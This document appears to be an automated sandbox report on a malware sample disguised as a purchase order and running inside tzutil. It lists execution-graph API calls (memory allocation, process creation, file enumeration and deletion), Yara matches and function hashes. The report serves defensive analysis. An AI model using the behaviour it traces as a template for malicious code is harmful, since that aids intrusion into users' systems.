                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CallFilterFunc@8
                                                          • String ID: @$@4_w@4_w
                                                          • API String ID: 4062629308-713214301
                                                          • Opcode ID: b6919ff2f4029a593c70c6d1c70f0482d3cf01ca72580bfd72cf6b6f2b5e3bf1
                                                          • Instruction ID: be1d780f5a38f05e7949f6c815b2dca7a012ab201feae5c371ac4c221620c34c
                                                          • Opcode Fuzzy Hash: b6919ff2f4029a593c70c6d1c70f0482d3cf01ca72580bfd72cf6b6f2b5e3bf1
                                                          • Instruction Fuzzy Hash: 06419071900219DFDB21EFADC840AAEBBB8FF95B40F00412EE915DB254E774DA41CBA5

                                                          Execution Graph

                                                          Execution Coverage:2.5%
                                                          Dynamic/Decrypted Code Coverage:4.3%
                                                          Signature Coverage:2.3%
                                                          Total number of Nodes:444
                                                          Total number of Limit Nodes:70
                                                          execution_graph 101911 1d26d0 101912 1e8e30 LdrInitializeThunk 101911->101912 101913 1d2706 101912->101913 101916 1e9810 101913->101916 101915 1d271b 101917 1e989f 101916->101917 101918 1e983b 101916->101918 101921 2cb2e80 LdrInitializeThunk 101917->101921 101918->101915 101919 1e98cd 101919->101915 101921->101919 101922 1d5fd0 101923 1d8500 LdrInitializeThunk 101922->101923 101925 1d6000 101923->101925 101926 1d602c 101925->101926 101927 1d8480 101925->101927 101928 1d84c4 101927->101928 101933 1d84e5 101928->101933 101934 1e8b00 101928->101934 101930 1d84d5 101931 1d84f1 101930->101931 101932 1e9780 NtClose 101930->101932 101931->101925 101932->101933 101933->101925 101935 1e8b2b 101934->101935 101936 1e8b7d 101934->101936 101935->101930 101939 2cb4650 LdrInitializeThunk 101936->101939 101937 1e8b9f 101937->101930 101939->101937 101940 1dc9d0 101942 1dc9f9 101940->101942 101941 1dcafc 101942->101941 101943 1dcaa0 FindFirstFileW 101942->101943 101943->101941 101945 1dcabb 101943->101945 101944 1dcae3 FindNextFileW 101944->101945 101946 1dcaf5 FindClose 101944->101946 101945->101944 101946->101941 101947 1e1ed0 101951 1e1ee9 101947->101951 101948 1e1f31 101949 1eb7f0 RtlFreeHeap 101948->101949 101950 1e1f41 101949->101950 101951->101948 101952 1e1f71 101951->101952 101954 1e1f76 101951->101954 101953 1eb7f0 RtlFreeHeap 101952->101953 101953->101954 101955 1d3553 101956 1d8180 2 API calls 101955->101956 101957 1d3563 101956->101957 101958 1d357f 101957->101958 101959 1e9780 NtClose 101957->101959 101959->101958 101965 1e16d1 101970 1e95f0 101965->101970 101967 1e16f2 101968 1e9780 NtClose 101967->101968 101969 1e1719 101968->101969 101971 1e961e 101970->101971 101972 1e969a 101970->101972 101971->101967 101973 1e96ad NtReadFile 101972->101973 101973->101967 101575 1d8c04 101576 1d8c14 101575->101576 101578 1d8adf 101576->101578 101579 1d74c0 101576->101579 101580 1d74d6 101579->101580 101582 1d750c 101579->101582 101580->101582 101583 1d7330 LdrLoadDll 101580->101583 101582->101578 101583->101582 101584 2cb2ad0 LdrInitializeThunk 101585 1da001 101586 1da016 101585->101586 101587 1da01b 101585->101587 101588 1da04d 101587->101588 101590 1eb7f0 101587->101590 101593 1e9ad0 101590->101593 101592 1eb806 101592->101588 101594 1e9aea 101593->101594 101595 1e9af8 RtlFreeHeap 101594->101595 101595->101592 101596 1c9f80 101597 1ca2cb 101596->101597 101599 1ca659 101597->101599 101600 1eb450 101597->101600 101601 1eb476 101600->101601 101606 1c4230 101601->101606 101603 1eb482 101604 1eb4bb 101603->101604 101609 1e5950 101603->101609 101604->101599 101613 1d3650 101606->101613 101608 1c423d 101608->101603 101610 1e59b2 101609->101610 101612 1e59bf 101610->101612 101631 1d1e00 101610->101631 101612->101604 101614 1d366d 101613->101614 101616 1d3680 101614->101616 101617 1ea1c0 101614->101617 101616->101608 101619 1ea1da 101617->101619 101618 1ea209 101618->101616 101619->101618 101624 1e8e30 101619->101624 101622 1eb7f0 RtlFreeHeap 101623 1ea27f 101622->101623 101623->101616 101625 1e8e4a 101624->101625 101628 2cb2c0a 101625->101628 101626 1e8e73 101626->101622 101629 2cb2c1f LdrInitializeThunk 101628->101629 101630 2cb2c11 101628->101630 101629->101626 101630->101626 101632 1d1e3b 101631->101632 101647 1d8290 101632->101647 101634 1d1e43 101646 1d211b 101634->101646 101658 1eb8d0 101634->101658 101636 1d1e59 101637 1eb8d0 RtlAllocateHeap 101636->101637 101638 1d1e6a 101637->101638 101639 1eb8d0 RtlAllocateHeap 101638->101639 101641 1d1e7b 101639->101641 101643 1d1f15 101641->101643 101669 1d6e30 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 101641->101669 101661 1d4990 101643->101661 101644 1d20cd 101665 1e8290 101644->101665 101646->101612 101648 1d82bc 101647->101648 101670 1d8180 101648->101670 101651 1d82e9 101652 1d82f4 101651->101652 101676 1e9780 101651->101676 101652->101634 101653 1d831d 101653->101634 101654 1d8301 101654->101653 101656 1e9780 NtClose 101654->101656 101657 1d8313 101656->101657 101657->101634 101684 1e9a90 101658->101684 101660 1eb8e8 101660->101636 101662 1d49b4 101661->101662 101663 1d49bb 101662->101663 101664 1d49f7 LdrLoadDll 101662->101664 101663->101644 101664->101663 101666 1e82f2 101665->101666 101668 1e82ff 101666->101668 101687 1d2130 101666->101687 101668->101646 101669->101643 101671 1d8276 101670->101671 101672 1d819a 101670->101672 101671->101651 101671->101654 101679 1e8ec0 101672->101679 101675 1e9780 NtClose 101675->101671 101677 1e979a 101676->101677 101678 1e97a8 NtClose 101677->101678 101678->101652 101680 1e8edd 101679->101680 101683 2cb35c0 LdrInitializeThunk 101680->101683 101681 1d826a 101681->101675 101683->101681 101685 1e9aaa 101684->101685 101686 1e9ab8 RtlAllocateHeap 101685->101686 101686->101660 101703 1d8560 101687->101703 101689 1d26b3 101689->101668 101690 1d2150 101690->101689 101707 1e1510 101690->101707 101693 1d2372 101715 1ec9c0 101693->101715 101695 1d21ae 101695->101689 101710 1ec890 101695->101710 101697 1d2387 101699 1d23cb 101697->101699 101721 1d0c80 101697->101721 101699->101689 101701 1d0c80 LdrInitializeThunk 101699->101701 101725 1d8500 101699->101725 101700 1d8500 LdrInitializeThunk 101702 1d2520 101700->101702 101701->101699 101702->101699 101702->101700 101704 1d856d 101703->101704 101705 1d858c SetErrorMode 101704->101705 101706 1d8593 101704->101706 101705->101706 101706->101690 101729 1eb760 101707->101729 101709 1e1531 101709->101695 101711 1ec8a6 101710->101711 101712 1ec8a0 101710->101712 101713 1eb8d0 RtlAllocateHeap 101711->101713 101712->101693 101714 1ec8cc 101713->101714 101714->101693 101716 1ec930 101715->101716 101717 1ec98d 101716->101717 101718 1eb8d0 RtlAllocateHeap 101716->101718 101717->101697 101719 1ec96a 101718->101719 101720 1eb7f0 RtlFreeHeap 101719->101720 101720->101717 101722 1d0c91 101721->101722 101736 1e9a00 101722->101736 101726 1d8513 101725->101726 101741 1e8d30 101726->101741 101728 1d853e 101728->101699 101732 1e98e0 101729->101732 101731 1eb791 101731->101709 101733 1e9978 101732->101733 101735 1e990e 101732->101735 101734 1e998b NtAllocateVirtualMemory 101733->101734 101734->101731 101735->101731 101737 1e9a1a 101736->101737 101740 2cb2c70 LdrInitializeThunk 101737->101740 101738 1d0ca2 101738->101702 101740->101738 101742 1e8dae 101741->101742 101744 1e8d5b 101741->101744 101746 2cb2dd0 LdrInitializeThunk 101742->101746 101743 1e8dd0 101743->101728 101744->101728 101746->101743 101747 1dfc00 101748 1dfc64 101747->101748 101776 1d66d0 101748->101776 101750 1dfd9e 101751 1dfd97 101751->101750 101783 1d67e0 101751->101783 101753 1dfe1a 101754 1dff52 101753->101754 101774 1dff43 101753->101774 101787 1df9f0 101753->101787 101755 1e9780 NtClose 101754->101755 101757 1dff5c 101755->101757 101758 1dfe56 101758->101754 101759 1dfe61 101758->101759 101760 1eb8d0 RtlAllocateHeap 101759->101760 101761 1dfe8a 101760->101761 101762 1dfea9 101761->101762 101763 1dfe93 101761->101763 101796 1df8e0 CoInitialize 101762->101796 101764 1e9780 NtClose 101763->101764 101766 1dfe9d 101764->101766 101767 1dfeb7 101799 1e9270 101767->101799 101769 1dff32 101770 1e9780 NtClose 101769->101770 101771 1dff3c 101770->101771 101772 1eb7f0 RtlFreeHeap 101771->101772 101772->101774 101773 1dfed5 101773->101769 101775 1e9270 LdrInitializeThunk 101773->101775 101775->101773 101777 1d6703 101776->101777 101778 1d6727 101777->101778 101803 1e9300 101777->101803 101778->101751 101780 1d674a 101780->101778 101781 1e9780 NtClose 101780->101781 101782 1d67ca 101781->101782 101782->101751 101784 1d6805 101783->101784 101808 1e9130 101784->101808 101788 1dfa0c 101787->101788 101789 1d4990 LdrLoadDll 101788->101789 101791 1dfa27 101789->101791 101790 1dfa30 101790->101758 101791->101790 101792 1d4990 LdrLoadDll 101791->101792 101793 1dfafb 101792->101793 101794 1d4990 LdrLoadDll 101793->101794 101795 1dfb55 101793->101795 101794->101795 101795->101758 101798 1df945 101796->101798 101797 1df9db CoUninitialize 101797->101767 101798->101797 101800 1e928d 101799->101800 101813 2cb2ba0 LdrInitializeThunk 101800->101813 101801 1e92ba 101801->101773 101804 1e931a 101803->101804 101807 2cb2ca0 LdrInitializeThunk 101804->101807 101805 1e9343 101805->101780 101807->101805 101809 1e914a 101808->101809 101812 2cb2c60 LdrInitializeThunk 101809->101812 101810 1d6879 101810->101753 101812->101810 101813->101801 101974 1db140 101979 1dae50 101974->101979 101976 1db14d 101993 1daac0 101976->101993 101978 1db163 101980 1dae75 101979->101980 102004 1d8760 101980->102004 101983 1dafc3 101983->101976 101985 1dafda 101985->101976 101986 1dafd1 101986->101985 101988 1db0c7 101986->101988 102023 1da510 101986->102023 101990 1db12a 101988->101990 102032 1da880 101988->102032 101991 1eb7f0 RtlFreeHeap 101990->101991 101992 1db131 101991->101992 101992->101976 101994 1daad6 101993->101994 102001 1daae1 101993->102001 101995 1eb8d0 RtlAllocateHeap 101994->101995 101995->102001 101996 1dab08 101996->101978 101997 1d8760 GetFileAttributesW 101997->102001 101998 1dae22 101999 1dae3b 101998->101999 102000 1eb7f0 RtlFreeHeap 101998->102000 101999->101978 102000->101999 102001->101996 102001->101997 102001->101998 102002 1da510 RtlFreeHeap 102001->102002 102003 1da880 RtlFreeHeap 102001->102003 102002->102001 102003->102001 102005 1d877f 102004->102005 102006 1d8791 102005->102006 102007 1d8786 GetFileAttributesW 102005->102007 102006->101983 102008 1e36f0 102006->102008 102007->102006 102009 1e36fe 102008->102009 102010 1e3705 102008->102010 102009->101986 102011 1d4990 LdrLoadDll 102010->102011 102012 1e3737 102011->102012 102013 1e3746 102012->102013 102036 1e31b0 LdrLoadDll 102012->102036 102015 1eb8d0 RtlAllocateHeap 102013->102015 102019 1e38f1 102013->102019 102016 1e375f 102015->102016 102017 1e38e7 102016->102017 102016->102019 102020 1e377b 102016->102020 102018 1eb7f0 RtlFreeHeap 102017->102018 102017->102019 102018->102019 102019->101986 102020->102019 102021 1eb7f0 RtlFreeHeap 102020->102021 102022 1e38db 102021->102022 102022->101986 102024 1da536 102023->102024 102037 1ddf40 102024->102037 102026 1da5a8 102028 1da730 102026->102028 102029 1da5c6 102026->102029 102027 1da715 102027->101986 102028->102027 102030 1da3d0 RtlFreeHeap 102028->102030 102029->102027 102042 1da3d0 102029->102042 102030->102028 102033 1da8a6 102032->102033 102034 1ddf40 RtlFreeHeap 102033->102034 102035 1da92d 102034->102035 102035->101988 102036->102013 102039 1ddf64 102037->102039 102038 1ddf6d 102038->102026 102039->102038 102040 1eb7f0 RtlFreeHeap 102039->102040 102041 1ddfb0 102040->102041 102041->102026 102043 1da3ed 102042->102043 102046 1ddfc0 102043->102046 102045 1da4f3 102045->102029 102047 1ddfe4 102046->102047 102048 1de08e 102047->102048 102049 1eb7f0 RtlFreeHeap 102047->102049 102048->102045 102049->102048 102050 1d7540 102051 1d755c 102050->102051 102059 1d75af 102050->102059 102053 1e9780 NtClose 102051->102053 102051->102059 102052 1d76e7 102056 1d7577 102053->102056 102055 1d76c1 102055->102052 102062 1d6b30 NtClose LdrInitializeThunk LdrInitializeThunk 102055->102062 102060 1d6960 NtClose LdrInitializeThunk LdrInitializeThunk 102056->102060 102059->102052 102061 1d6960 NtClose LdrInitializeThunk LdrInitializeThunk 102059->102061 102060->102059 102061->102055 102062->102052 101814 1e9480 101815 1e9537 101814->101815 101817 1e94af 101814->101817 101816 1e954a NtCreateFile 101815->101816 101818 1e0500 101819 1e051d 101818->101819 101820 1d4990 LdrLoadDll 101819->101820 101821 1e0538 101820->101821 102063 1e1b40 102064 1e1b5c 102063->102064 102065 1e1b98 102064->102065 102066 1e1b84 102064->102066 102067 1e9780 NtClose 102065->102067 102068 1e9780 NtClose 102066->102068 102070 1e1ba1 102067->102070 102069 1e1b8d 102068->102069 102073 1eb910 RtlAllocateHeap 102070->102073 102072 1e1bac 102073->102072 102074 1e63c0 102075 1e641a 102074->102075 102076 1e6427 102075->102076 102078 1e3e10 102075->102078 102079 1eb760 NtAllocateVirtualMemory 102078->102079 102081 1e3e51 102079->102081 102080 1e3f50 102080->102076 102081->102080 102082 1d4990 LdrLoadDll 102081->102082 102084 1e3e91 102082->102084 102083 1e3ed2 Sleep 102083->102084 102084->102080 102084->102083 102085 1ec8f0 102086 1eb7f0 RtlFreeHeap 102085->102086 102087 1ec905 102086->102087 102093 1d276c 102094 1d2702 102093->102094 102095 1d271b 102094->102095 102096 1e9810 LdrInitializeThunk 102094->102096 102096->102095 101824 1d2ba5 101825 1d66d0 2 API calls 101824->101825 101826 1d2bd0 101825->101826 101828 1c9f20 101830 1c9f2f 101828->101830 101829 1c9f6d 101830->101829 101831 1c9f5a CreateThread 101830->101831 102097 1cb960 102098 1eb760 NtAllocateVirtualMemory 102097->102098 102099 1ccfd1 102097->102099 102098->102099 101832 1d7720 101833 1d778f 101832->101833 101834 1d7738 101832->101834 101834->101833 101836 1db660 101834->101836 101838 1db686 101836->101838 101837 1db8b3 101837->101833 101838->101837 101863 1e9b50 101838->101863 101840 1db6f9 101840->101837 101841 1ec9c0 2 API calls 101840->101841 101842 1db718 101841->101842 101842->101837 101843 1db7ec 101842->101843 101844 1e8e30 LdrInitializeThunk 101842->101844 101845 1d5f50 LdrInitializeThunk 101843->101845 101847 1db80b 101843->101847 101846 1db77a 101844->101846 101845->101847 101846->101843 101850 1db783 101846->101850 101851 1db89b 101847->101851 101869 1e89a0 101847->101869 101848 1db7d4 101852 1d8500 LdrInitializeThunk 101848->101852 101849 1db7b2 101884 1e4ae0 LdrInitializeThunk 101849->101884 101850->101837 101850->101848 101850->101849 101866 1d5f50 101850->101866 101853 1d8500 LdrInitializeThunk 101851->101853 101857 1db7e2 101852->101857 101858 1db8a9 101853->101858 101857->101833 101858->101833 101859 1db872 101874 1e8a50 101859->101874 101861 1db88c 101879 1e8bb0 101861->101879 101864 1e9b6d 101863->101864 101865 1e9b7e CreateProcessInternalW 101864->101865 101865->101840 101885 1e8ff0 101866->101885 101868 1d5f8b 101868->101849 101870 1e89cb 101869->101870 101871 1e8a1d 101869->101871 101870->101859 101891 2cb39b0 LdrInitializeThunk 101871->101891 101872 1e8a3f 101872->101859 101875 1e8ad0 101874->101875 101877 1e8a7e 101874->101877 101892 2cb4340 LdrInitializeThunk 101875->101892 101876 1e8af2 101876->101861 101877->101861 101880 1e8c30 101879->101880 101882 1e8bde 101879->101882 101893 2cb2fb0 LdrInitializeThunk 101880->101893 101881 1e8c52 101881->101851 101882->101851 101884->101848 101886 1e90a1 101885->101886 101888 1e901f 101885->101888 101890 2cb2d10 LdrInitializeThunk 101886->101890 101887 1e90e3 101887->101868 101888->101868 101890->101887 101891->101872 101892->101876 101893->101881 101894 1d71a0 101895 1d71ca 101894->101895 101898 1d8330 101895->101898 101897 1d71f1 101899 1d834d 101898->101899 101905 1e8f10 101899->101905 101901 1d839d 101902 1d83a4 101901->101902 101903 1e8ff0 LdrInitializeThunk 101901->101903 101902->101897 101904 1d83cd 101903->101904 101904->101897 101906 1e8fab 101905->101906 101907 1e8f3b 101905->101907 101910 2cb2f30 LdrInitializeThunk 101906->101910 101907->101901 101908 1e8fe1 101908->101901 101910->101908 102100 1d11e0 102101 1d11fa 102100->102101 102102 1d4990 LdrLoadDll 102101->102102 102103 1d1215 102102->102103 102104 1d1249 PostThreadMessageW 102103->102104 102105 1d125a 102103->102105 102104->102105 102106 1e8c60 102107 1e8cf2 102106->102107 102109 1e8c8e 102106->102109 102111 2cb2ee0 LdrInitializeThunk 102107->102111 102108 1e8d20 102111->102108 102112 1e96e0 102113 1e970b 102112->102113 102114 1e9757 102112->102114 102115 1e976a NtDeleteFile 102114->102115 102116 1e8de0 102117 1e8dfa 102116->102117 102120 2cb2df0 LdrInitializeThunk 102117->102120 102118 1e8e1f 102120->102118

                                                          Executed Functions

                                                          Function 001C9F80 Relevance: 26.7, Strings: 21, Instructions: 431COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 26 1c9f80-1ca2c1 27 1ca2cb-1ca2d5 26->27 28 1ca2d7-1ca2f6 27->28 29 1ca321-1ca32b 27->29 30 1ca308-1ca319 28->30 31 1ca2f8-1ca306 28->31 32 1ca33c-1ca348 29->32 33 1ca31f 30->33 31->33 34 1ca34a-1ca354 32->34 35 1ca356 32->35 33->27 34->32 36 1ca35d-1ca364 35->36 38 1ca396-1ca3a0 36->38 39 1ca366-1ca394 36->39 40 1ca3b1-1ca3bd 38->40 39->36 41 1ca3cd-1ca3d7 40->41 42 1ca3bf-1ca3cb 40->42 44 1ca3e8-1ca3f4 41->44 42->40 45 1ca40b-1ca41c 44->45 46 1ca3f6-1ca409 44->46 48 1ca42d-1ca436 45->48 46->44 49 1ca44c-1ca456 48->49 50 1ca438-1ca44a 48->50 52 1ca467-1ca473 49->52 50->48 53 1ca48a-1ca48e 52->53 54 1ca475-1ca488 52->54 56 1ca4b7 53->56 57 1ca490-1ca4b5 53->57 54->52 58 1ca4be-1ca4c7 56->58 57->53 59 1ca4cd-1ca4d4 58->59 60 1ca5d0-1ca5da 58->60 61 1ca506-1ca509 59->61 62 1ca4d6-1ca504 59->62 63 1ca5eb-1ca5f7 60->63 64 1ca50f-1ca518 61->64 62->59 65 1ca60e-1ca618 63->65 66 1ca5f9-1ca60c 63->66 67 1ca51a-1ca532 64->67 68 1ca534-1ca543 64->68 70 1ca629-1ca635 65->70 66->63 67->64 71 1ca54a-1ca554 68->71 72 1ca545 68->72 73 1ca647-1ca64e 70->73 74 1ca637-1ca63d 70->74 75 1ca565-1ca571 71->75 72->60 78 1ca654 call 1eb450 73->78 79 1ca6f7-1ca6fb 73->79 76 1ca63f-1ca642 74->76 77 1ca645 74->77 80 1ca587-1ca59b 75->80 81 1ca573-1ca585 75->81 76->77 77->70 89 1ca659-1ca663 78->89 84 1ca73c-1ca746 79->84 85 1ca6fd-1ca71e 79->85 87 1ca5ac-1ca5b5 80->87 81->75 86 1ca757-1ca760 84->86 90 1ca72c-1ca73a 85->90 91 1ca720-1ca729 85->91 92 1ca774-1ca77e 86->92 93 1ca762-1ca772 86->93 94 1ca5cb 87->94 95 1ca5b7-1ca5c9 87->95 96 1ca674-1ca67d 89->96 90->79 91->90 100 1ca7b6-1ca7ba 92->100 101 1ca780-1ca79a 92->101 93->86 94->58 95->87 97 1ca68d-1ca694 96->97 98 1ca67f-1ca68b 96->98 103 1ca6bd-1ca6c7 97->103 104 1ca696-1ca6a7 97->104 98->96 108 1ca7bc-1ca7d3 100->108 109 1ca7d5-1ca7df 100->109 106 1ca79c-1ca7a0 101->106 107 1ca7a1-1ca7a3 101->107 112 1ca6d8-1ca6e4 103->112 110 1ca6ae-1ca6b0 104->110 111 1ca6a9-1ca6ad 104->111 106->107 113 1ca7b4 107->113 114 1ca7a5-1ca7ae 107->114 108->100 115 1ca7f0-1ca7fa 109->115 116 1ca6bb 110->116 117 1ca6b2-1ca6b8 110->117 111->110 112->79 118 1ca6e6-1ca6f5 112->118 113->92 114->113 119 1ca7fc-1ca80f 115->119 120 1ca811-1ca81a 115->120 116->97 117->116 118->112 119->115
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ".$'$-q$.j$1G$4U$7$9$@<$B0$Ng$T_$[_$dr$n$o$tp$u$z$R$i
                                                          • API String ID: 0-3230942322
                                                          • Opcode ID: bc51f6a1ce9aaac1695b1a1b673ad3f396dd2c56a153190872854295812d8397
                                                          • Instruction ID: ace9a9ebf42c6f3960f2c97e804f06e397d60066b58db788a2e520dda96a3ec0
                                                          • Opcode Fuzzy Hash: bc51f6a1ce9aaac1695b1a1b673ad3f396dd2c56a153190872854295812d8397
                                                          • Instruction Fuzzy Hash: 3C328DB0E0566CCFEB29CF44C894BDDBBB1BF55308F9481D9D04A6A280C7B59A85CF46
                                                          Function 001DC9D0 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(?,00000000), ref: 001DCAB1
                                                          • FindNextFileW.KERNELBASE(?,00000010), ref: 001DCAEE
                                                          • FindClose.KERNELBASE(?), ref: 001DCAF9
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$File$CloseFirstNext
                                                          • String ID:
                                                          • API String ID: 3541575487-0
                                                          • Opcode ID: 9efabfec53aab301c1426a02d9abc6dfc8d0331be8f0d257ef249e84ffe0ed2d
                                                          • Instruction ID: 0024cd30ed9b013d82274c72115762b27472c97e9ec353b0de62898dbefd71f4
                                                          • Opcode Fuzzy Hash: 9efabfec53aab301c1426a02d9abc6dfc8d0331be8f0d257ef249e84ffe0ed2d
                                                          • Instruction Fuzzy Hash: C731A3729007497BDB20DB60CC85FEF777C9F54705F144559B908A7281EBB0AA84CBA0
                                                          Function 001E9480 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtCreateFile.NTDLL(?,?,5BC7A5B0,?,?,?,?,?,?,?,?), ref: 001E957B
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 8ba261b2d37e6a8c686c9a337af97115225191aaef6764030400665b8a8f1ef3
                                                          • Instruction ID: 0f1b3247cdfce9a9376d1c1ef2ee7f756611318eceb5dec130c57d56dc2a5cec
                                                          • Opcode Fuzzy Hash: 8ba261b2d37e6a8c686c9a337af97115225191aaef6764030400665b8a8f1ef3
                                                          • Instruction Fuzzy Hash: 3B31DDB5A01648AFCB54DF99D881EEFB7F9EF88304F108219F908A7341D730A951CBA5
                                                          Function 001E95F0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtReadFile.NTDLL(?,?,5BC7A5B0,?,?,?,?,?,?), ref: 001E96D6
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 8854d8be901c82b9d220803e696c0cf83c1867f68dd6e83b9ca46992c6265491
                                                          • Instruction ID: e63eb783a7863a689520428167e67e00e5309f1a60d88802131cb7b6817a6ad8
                                                          • Opcode Fuzzy Hash: 8854d8be901c82b9d220803e696c0cf83c1867f68dd6e83b9ca46992c6265491
                                                          • Instruction Fuzzy Hash: 4131E2B5A00648AFCB14DF99D881EEFB7F9EF89704F108209F958A7341D730A911CBA5
                                                          Function 001E98E0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(001D21AE,?,5BC7A5B0,00000000,00000004,00003000,?,?,?,?,?,001E82FF,001D21AE), ref: 001E99A8
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: 5b92f69d731c09572eaa479caca9063e28d84d04115c7dc8f8bf517fd5e8e384
                                                          • Instruction ID: 8a33cc11080ceff30150de96eb6447d1ff04de521442807bee0d411ba5460b01
                                                          • Opcode Fuzzy Hash: 5b92f69d731c09572eaa479caca9063e28d84d04115c7dc8f8bf517fd5e8e384
                                                          • Instruction Fuzzy Hash: 052133B1A00649ABDB10DF99CC81FEFB7B9EF89304F108109F948AB341D774A910CBA1
                                                          Function 001E96E0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteFile
                                                          • String ID:
                                                          • API String ID: 4033686569-0
                                                          • Opcode ID: 38d2c0a562f0e836078364a94c412914a01c43bf8487e80c7c7915257a3d256d
                                                          • Instruction ID: 428d74f5e18880d12533696b51be1b01243e64c8f85a5043543a7c77721ebb67
                                                          • Opcode Fuzzy Hash: 38d2c0a562f0e836078364a94c412914a01c43bf8487e80c7c7915257a3d256d
                                                          • Instruction Fuzzy Hash: 3911A071A01748BAD720EA55CC42FAFB3ACEF95704F104009F94C6B281DB70B904CBE6
                                                          Function 001E9780 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 001E97B1
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 2f59229fe5a35477addfa38c4a351323b046b53500d51ab444dffaebc889c80f
                                                          • Instruction ID: 48f1237ef79035391bbb999fd79a199497de2e73e14fe661e4678bf8eda9f067
                                                          • Opcode Fuzzy Hash: 2f59229fe5a35477addfa38c4a351323b046b53500d51ab444dffaebc889c80f
                                                          • Instruction Fuzzy Hash: C9E08C36201604BBD220FA5ADC01F9BB76CEFD6715F418019FA48A7242C771B9148BF1
                                                          Function 02CB4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 58a2cb78ea68d4fb0da6937210f759f165f2398c77e381bdba94817339f9b615
                                                          • Instruction ID: 12e9b75e274a290f6017e350ab98062a1c399ba5ae249e13380a68dd8159bc90
                                                          • Opcode Fuzzy Hash: 58a2cb78ea68d4fb0da6937210f759f165f2398c77e381bdba94817339f9b615
                                                          • Instruction Fuzzy Hash: 7F900271A4580012914171594884547400597E0701B65C115E0424554C8A158A565361
                                                          Function 02CB4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
